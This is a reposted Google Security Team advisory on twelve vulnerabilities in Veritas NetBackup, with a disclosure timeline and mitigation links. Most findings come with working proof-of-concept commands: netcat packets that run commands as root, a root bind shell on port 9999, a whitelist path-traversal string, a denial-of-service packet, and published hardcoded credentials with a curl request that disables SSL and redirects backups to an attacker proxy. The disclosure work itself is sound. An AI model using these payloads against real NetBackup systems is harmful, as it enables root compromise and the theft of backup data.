Veritas NetBackup DoS / Command Execution / Privilege Escalation / Traversal

2017-03-01T00:00:00
ID PACKETSTORM:141379
Type packetstorm
Reporter Andrew Griffiths
Modified 2017-03-01T00:00:00

Description

                                        
                                            `Veritas NetBackup and NetBackup appliance - Multiple Vulnerabilities  
--------------------------------------------------------------------  
  
Introduction  
============  
Multiple critical vulnerabilities were identified in Veritas NetBackup  
and NetBackup appliance. The vulnerabilities were discovered during a  
black box security assessment and therefore the vulnerability list  
should not be considered exhaustive.  
  
Affected Software and Versions  
==============================  
- Tested with Veritas NetBackup 6.5.6, 7.6.1.0  
- No newer versions were tested  
- Veritas confirmed the affected versions to be:  
- NetBackup 7.7.2 and below  
- NetBackup Appliance 2.7.2 and below  
- NB-03, NB-07, NB-08 and NB-12 are also affecting the newest  
NetBackup 8.0 and NetBackup Appliance 3.0 release  
  
Note: According to Veritas, issues NB-03, NB-07, NB-08 and NB-12 have  
no fix available as of release of this report. The target date for  
patches that fix these issues is 29th September, 2017. See the following  
Advisory for more information:  
https://www.veritas.com/content/support/en_US/security/VTS17-003.html  
  
CVE  
===  
No CVEs have been assigned yet.  
  
Author  
======  
The vulnerabilities were discovered by Sven Blumenstein, Xiaoran Wang  
and Andrew Griffiths from Google Security Team.  
  
Vulnerability Overview  
======================  
  
1. NB-01: CRITICAL: Privileged remote code execution via pbx_exchange  
2. NB-02: CRITICAL: Local privilege escalation via bpcd  
3. NB-03: MODERATE: Denial of Service affecting bpdbm  
4. NB-04: CRITICAL: Privileged remote code execution via bprd  
5. NB-05: CRITICAL: Path traversal in several applications  
6. NB-06: HIGH: Arbitrary command execution via bpnbat  
7. NB-07: CRITICAL: Hostname based security model  
8. NB-08: HIGH: Local privilege escalation in pbx_exchange  
9. NB-09: LOW: World writable log files  
10. NB-10: HIGH: Netbackup processes run as privileged user  
11. NB-11: CRITICAL: Auth bypass for Netbackup Cloud Storage Service  
12. NB-12: CRITICAL: Unauthenticated CORBA interface exposing service APIs  
  
Vulnerability Details  
=====================  
  
--------------------------------------------------------  
NB-01: Privileged remote code execution via pbx_exchange  
--------------------------------------------------------  
Severity: CRITICAL  
  
The pbx_exchange process allows remote privileged remote code execution by  
sending a special packet leveraging the C_REMOTE_EXECUTE (0x46) call.  
  
The following command executes a/usr/bin/ida on the Netbackup server  
10.0.0.1:  
  
$ echo -ne "ack=1\nextension=bprd\n\n329199 70 localhost root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id\n" | nc 10.0.0.1  
1556  
  
Strace output:  
[pid 18240] execve("/bin/sh", ["sh", "-c",  
"/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 21 vars  
*/]) = 0  
[pid 18240]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id",  
["/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 21 vars  
*/]) = 0  
[pid 18240] write(1, "uid=0(root) gid=0(root) groups=0(root)  
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n", 101) = 101  
  
By replacing the parameter alocalhosta the server can be instructed to  
execute the command on a Netbackup client. The following command executes  
a/usr/bin/ida on the Netbackup client 10.0.0.111:  
  
$ echo -ne "ack=1\nextension=bprd\n\n329199 70 10.0.0.111 root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id\n" | nc 10.0.0.1  
1556  
  
Strace output:  
[pid 27150] execve("/bin/sh", ["sh", "-c",  
"/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 16 vars  
*/]) = 0  
strace: Process 27151 attached  
[pid 27151]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id",  
["/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 16 vars  
*/]) = 0  
[pid 27151] write(1, "uid=0(root) gid=0(root) groups=0(root)\n", 39) = 39  
  
------------------------------------------  
NB-02: Local privilege escalation via bpcd  
------------------------------------------  
Severity: CRITICAL  
  
By sending a crafted packet to the bpcd daemon, it is possible to execute  
privileged commands.  
  
The following command starts a privileged netcat shell on port 9999:  
$ echo -ne  
"-437860936\x00\x00\x00\x31\x00\x00\x00O/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc  
foo -lp 9999 -e/bin/sh" | nc 127.0.0.1 13782  
^Z  
[3]+ Stopped [...]  
$ nc 127.0.0.1 9999  
id  
uid=0(root) gid=0(root) groups=0(root)  
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023  
  
----------------------------------------  
NB-03: Denial of Service affecting bpdbm  
----------------------------------------  
Severity: MODERATE  
  
By sending a crafted packet to the bpdbm process, it is possible to shutdown  
the process and disrupt the functionality of the Netbackup server  
application.  
  
The following command terminates the bpdbm process on the Netbackup server  
10.0.0.1:  
  
$ echo -ne "1041669 99\n" | nc 10.0.0.1 13721  
  
Log file excerpt of the bpdbm process:  
19:22:18.384 [25272] <4> dbm_terminate: termination begun...error code = 0  
19:22:18.389 [25272] <4> db_error_add_to_file: bpdbm TERMINATED  
19:22:18.389 [25272] <4> dbm_terminate: bpdbm TERMINATED  
  
------------------------------------------------  
NB-04: Privileged remote code execution via bprd  
------------------------------------------------  
Severity: CRITICAL  
  
The bprd process allows remote privileged remote code execution by sending  
a special packet leveraging the C_REMOTE_EXECUTE (0x46) call.  
  
The following command executes a/usr/bin/ida on the Netbackup server  
10.0.0.1:  
  
$ echo -ne "329199 94 localhost root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id foo\n" | nc  
10.0.0.1 13720  
  
Strace output:  
[pid 21161]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id", ["foo"],  
[/* 21 vars */]) = 0  
[pid 21161] write(1, "uid=0(root) gid=0(root) groups=0(root)  
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n", 101) = 101  
  
By replacing the parameter alocalhosta the server can be instructed to  
execute the command on a Netbackup client. The following command executes  
a/usr/bin/ida on the Netbackup client 10.0.0.111:  
  
$ echo -ne "329199 94 10.0.0.111 root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id foo\n" | nc  
10.0.0.1 13720  
  
Strace output:  
[pid 27435]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id", ["foo"],  
[/* 16 vars */] <unfinished ...>  
[pid 27435] write(1, "uid=0(root) gid=0(root) groups=0(root)\n", 39) = 39  
  
---------------------------------------------  
NB-05: Path traversal allows whitelist escape  
---------------------------------------------  
Severity: CRITICAL  
  
Multiple Netbackup services that execute external commands check if the  
requested command exists in a whitelist of folders. The whitelist consists  
of the following list of directories:  
  
/usr/openv/volmgr/bin  
/usr/openv/bin  
/usr/openv/netbackup/bin/admincmd  
/usr/openv/netbackup/bin/private  
/usr/openv/netbackup/bin/support  
/usr/openv/netbackup/bin  
  
It was discovered that all tested processes are vulnerable to path  
traversal,  
as also shown in the previously written examples. An attacker can use the  
usual a../a pattern to bypass the whitelist check and execute arbitrary  
commands.  
  
The following string bypasses the validation and executes a/usr/bin/nca:  
  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc foo -lp 9999  
-e/bin/sh  
  
Note: A total of over 500 executables was discovered in the whitelisted  
directories. It is possible that some executables contain vulnerabilities  
that  
could be leveraged for arbitrary command execution without the need of path  
traversal. One example (bpnbat) is listed in this report.  
  
---------------------------------------------  
NB-06: Arbitrary command execution via bpnbat  
---------------------------------------------  
Severity: HIGH  
  
The executable bpnbat allows execution of any passed command. This can be  
combined  
with other vulnerabilities to allow arbitrary command execution.  
  
The following command executes a/usr/bin/ida:  
  
$ /usr/openv/netbackup/bin/bpnbat -Execute -cf /root /usr/bin/id  
  
Note: This is just an example and does not imply that this executable is  
the only  
one vulnerable to command injection.  
  
As a lot of Netbackup processes rely on the execution of commands in  
whitelisted  
directories, having the option to do arbitrary command execution could  
allow an  
attacker to execute any command, even if whitelisting checks are properly  
implemented.  
  
------------------------------------  
NB-07: Hostname based security model  
------------------------------------  
Severity: CRITICAL  
  
It was discovered that several services on the Netbackup service rely  
purely on  
hostname validation for authenticity. E.g. a client connecting to the vnetd  
daemon  
on a Netbackup server has to be known to the server by hostname.  
  
As the validating process goes through the operating systems DNS system to  
get the  
hostname for the connecting IP, this approach could be vulnerable to DNS  
spoofing.  
  
--------------------------------------------------------------------  
NB-08: Local privilege escalation via race condition in pbx_exchange  
--------------------------------------------------------------------  
Severity: HIGH  
  
It was discovered that during the startup of pbx_exchange, it  
creates,binds, and  
listens to sockets under a/tmpa for different components, such as  
a/tmp/PBXPIPEbprda,  
a/tmp/PBXPIPEnbarsa, etc.  
The sockets are created with 777 mode and later changed to 600 with  
achmod(socket_path, 600)a  
after alisten(socket)a is called. Components connect to these sockets to  
create a data transfer  
socket, which is then used by pbx_exchange to forward client sockets to  
those components.  
The initial listening sockets under /tmp are unlinked afterwards.  
  
Since the socket is created in a shared directory and with 777 permissions,  
an unprivileged  
process can connect to the sockets in a/tmp/PBXPIPE*a and impersonate the  
legitimate components.  
  
----------------------------------  
9. NB-09: World writable log files  
----------------------------------  
Severity: LOW  
  
It was discovered that many log files under a/usr/openv/netbackup/logsa are  
world  
writable, if logging is enabled.  
  
Example:  
# ls -l /usr/openv/netbackup/logs/bpjobd/  
total 26200  
-rw-rw-rw-. 1 root root 1512752 Nov 10 23:59 log.111016  
-rw-rw-rw-. 1 root root 4783063 Nov 11 23:59 log.111116  
-rw-rw-rw-. 1 root root 1814107 Nov 12 09:39 log.111216  
  
World writable logs cannot ensure the integrity of the log files, enabling  
an  
attacker to tamper with the logs.  
  
-----------------------------------------------------  
10. NB-10: Netbackup processes run as privileged user  
-----------------------------------------------------  
Severity: HIGH  
  
All Netbackup processes run as privileged user aroota. This significantly  
eases an  
attackerto gain control over the targeted system through vulnerabilities  
discovered  
in Netbackup services. It also makes potential hardening of the Netbackup  
processes difficult.  
  
----------------------------------------------------------  
11. NB-11: Auth bypass for Netbackup Cloud Storage Service  
----------------------------------------------------------  
Severity: CRITICAL  
  
Netbackup Client and Server installations run a service called anbcssca by  
default. This service  
listens on any interface, tcp/5637 and provides a HTTPS based webserver on  
this port.  
  
This webserver is providing a REST API that is used to control/configure  
the Netbackup  
Cloud Storage Service. The authentication for this webserver is done  
through the  
hardcoded username and password acsscuser:csscpwd`. Using these credentials  
it is possible  
to query and modify the Cloud Storage configuration.  
  
The following command disables SSL transport encryption for Cloud backups  
and configures  
an arbitrary proxy server a10.13.37.0a to the Cloud Storage Service for  
Amazon running  
on the Netbackup system 10.0.0.1. This would send all future backups  
unencrypted through  
the attacker controlled proxy server:  
  
$ curl -d "name=AMZ:USE_SSL,description=Use SSL encryption for  
control,type=string,value=NO,fixed=n;name=AMZ:PROXY_IP,description=Specify  
CURL proxy IP,type=string,value=10.13.37.0,fixed=n;" -X POST -u  
csscuser:csscpwd -k https://10.0.0.1:5637/config/CS_Amazon/amazon  
  
Reply:  
name=CS_RESPONSE,description=Success,type=int,value=0,fixed=n;  
  
The log file of `nbcssc` confirms the successful change of the  
configuration:  
16/11/17 16:00:03 OST : libsts setupp() 16/11/17 16:00:03:  
CS_Amazon:amazon claimed by /usr/openv/lib/ost-plugins/libstspiamazonMT.so  
[...]  
16/11/17 16:00:03 OST : amazon: AMZ:USE_SSL=NO  
16/11/17 16:00:03 OST : amazon: AMZ:PROXY_IP=10.13.37.0  
16/11/17 16:00:03 OST : amazon: Closing user pref file  
(/usr/openv/lib/ost-plugins/libstspiamazon.pref)  
  
Verification of the changed configuration file locally:  
  
# cat /usr/openv/lib/ost-plugins/libstspiamazon.pref  
AMZ:USE_SSL=NO  
AMZ:USE_SSL_RW=YES  
AMZ:WRITE_BUFFER_SIZE=10485760  
AMZ:WRITE_BUFFER_NUM=1  
AMZ:LOG_CURL=NO  
AMZ:READ_BUFFER_SIZE=0  
AMZ:PROXY_TYPE=NONE  
AMZ:PROXY_IP=10.13.37.0  
AMZ:PROXY_PORT=70000  
AMZ:CURL_CONNECT_TIMEOUT=300  
AMZ:CURL_TIMEOUT=900  
  
  
----------------------------------------------------------------  
12. NB-12: Unauthenticated CORBA interface exposing service APIs  
----------------------------------------------------------------  
Severity: CRITICAL  
  
Several components of the Netbackup installation communicate through CORBA  
& TAO  
(http://www.cs.wustl.edu/~schmidt/TAO.html). It was discovered that the  
CORBA endpoints  
of several services can be reached through the pbx_exchange service via  
tcp/1556. There  
is no authentication involved and pbx_exchange listens on any IP.  
  
The following example sends a `ping` command to the service `nbjm` on the  
Netbackup  
server 10.0.0.1 and shows the successful GIOP reply packet:  
  
# echo -ne  
'extension=nbjm\x0a\x0aGIOP\x01\x02\x01\x00d\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00\x00\x00\x01\x00%\x00\x00\x00\x14\x01\x0f\x00NUP\x00\x00\x00\x0e\x00\x00\x00\x00\x01\x00\x00\x00\x00nbjm\x00\x01\x00\x00\x00\x01\x00\x00\x00nbjmbjm\x05\x00\x00\x00ping\x00nbj\x01\x00\x00\x00\x01\x00\x00\x00\x0c\x00\x00\x00\x017i\x9b\x01\x00\x01\x05\t\x01\x01\x00\x00\x00\x00\x00\xff\xff\xff\xff'  
| nc 10.0.0.1 1556 | xxd  
0000000: 0147 494f 5001 0201 0110 0000 0005 0000 .GIOP...........  
0000010: 0000 0000 0000 0000 0000 0000 00 .............  
  
  
Brief checking on some of the CORBA endpoint showed that there are API  
functions for  
accessing configuration settings (e.g. `updateDiskVolumeList`) or executing  
commands  
(e.g. `runBPCRClientCmd`).  
  
Mitigation  
==========  
Please see the advisory for these issues provided by Veritas for guidance  
around mitigation:  
  
https://www.veritas.com/content/support/en_US/security/VTS17-003.html  
  
Timeline  
========  
2016/11/29 - Security report sent to secure@veritas.com with 90 day  
disclosure deadline  
2016/12/02 - Veritas confirmed recipe of report  
2016/12/13 to 2017/02/03 - Several emails between Google Security and  
Veritas regarding verification / details on issues  
2017/02/03 - Veritas asks for deadline extension until 2017/10/01, as of 4  
unpatched issues  
2017/02/03 - Google Security points to Googles 90-day public disclosure  
policy and rejects  
deadline extension.  
2017/02/27 - Google Security asks Veritas for information around mitigation  
that can be added to this advisory.  
2017/02/27 - Veritas shares link to public advisory that includes  
mitigation advises for  
customers (  
https://www.veritas.com/content/support/en_US/security/VTS17-003.html)  
2017/02/28 - Public disclosure  
  
  
`